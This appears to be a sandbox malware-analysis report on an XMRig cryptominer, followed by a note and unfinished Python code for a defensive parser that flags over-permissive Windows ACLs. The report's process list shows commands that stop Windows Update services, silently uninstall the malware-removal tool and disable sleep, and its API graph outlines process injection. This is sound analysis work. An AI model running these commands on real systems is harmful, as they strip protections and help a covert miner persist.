                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:42
                                                      Start time:10:10:19
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff6f73e0000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:43
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f4b70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:46
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:47
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff621dd0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:48
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:49
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:50
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:51
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:52
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:53
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:54
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:55
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:56
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:57
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:58
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:59
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:60
                                                      Start time:10:10:20
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:61
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:62
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:63
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:64
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:65
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:66
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:67
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:68
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:69
                                                      Start time:10:10:21
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff77afe0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1534557737.00007FF641DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF641DC0000, based on PE: true
                                                        • Associated: 00000000.00000002.1534528500.00007FF641DC0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1534604518.00007FF641DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1534629396.00007FF641DCF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1534693688.00007FF641DD0000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1535247939.00007FF6422C4000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1535305719.00007FF6422FC000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff641dc0000_xmr new.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: 396df7b951f83921384d6718dedb4ef1ad96527ad72314e3859fdf7388d85454
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: 98B012F0D0C319C8E3033F41D8413583260AB4D741F400A30C60C43352DF7D90414B10

                                                        Execution Graph

                                                        Execution Coverage:46.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:67%
                                                        Total number of Nodes:227
                                                        Total number of Limit Nodes:24
                                                        execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 
140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 
480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 
545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 
140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
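The string table of this function carries the SDDL D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), and the execution graph shows the same function calling ConvertStringSecurityDescriptorToSecurityDescriptorW and RegSetKeySecurity right after RegCreateKeyExW on SOFTWARE\dialerconfig, before a "pid" value is written there. Decoded, that descriptor has two inheritable allow ACEs granting GENERIC_ALL: one to Authenticated Users, one to Builtin Administrators, so every logged-on account can read and rewrite the key. The Python below is an added example, not code from the report or from the sample: a small SDDL DACL parser that decodes each ACE and flags allow ACEs that hand write-class rights to a broad trustee. The SID, rights and flag tables are a subset of the documented SDDL abbreviations; the set of "broad" trustees, the write-rights heuristic and the hex write mask are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List

# SDDL abbreviations (subset of the documented tables in sddl.h).
TRUSTEES = {
    "AU": "Authenticated Users", "BA": "Builtin Administrators", "BU": "Builtin Users",
    "WD": "Everyone", "IU": "Interactive Users", "AN": "Anonymous", "SY": "Local System",
}
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE",
    "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED"}

# Trustees that cover ordinary accounts; write rights for them mean anyone can tamper (example's choice).
BROAD_TRUSTEES = {"AU", "BU", "WD", "IU", "AN"}
# Abbreviations that allow modifying the object or its security (example's choice).
WRITE_RIGHTS = {"GA", "GW", "WD", "WO", "SD", "KA", "KW", "FA", "FW"}
# Same idea for a hex mask: GENERIC_ALL, GENERIC_WRITE, WRITE_DAC, WRITE_OWNER, DELETE, plus the
# object-specific low bits 0x2/0x4 (KEY_SET_VALUE/KEY_CREATE_SUB_KEY, FILE_WRITE_DATA/FILE_APPEND_DATA).
WRITE_MASK = 0x10000000 | 0x40000000 | 0x00040000 | 0x00080000 | 0x00010000 | 0x2 | 0x4


@dataclass
class Ace:
    ace_type: str        # "A" allow, "D" deny, ...
    flags: List[str]     # inheritance flags, two letters each
    rights: List[str]    # two-letter abbreviations, or a single "0x..." mask
    trustee: str         # SID abbreviation or a literal S-1-... SID


def _pairs(s: str) -> List[str]:
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_dacl(sddl: str) -> List[Ace]:
    """Parse the DACL part of an SDDL string ("D:" + optional P/AR/AI flags + ACEs) into records."""
    m = re.search(r"D:(?:P|AR|AI)*((?:\([^)]*\))+)", sddl)
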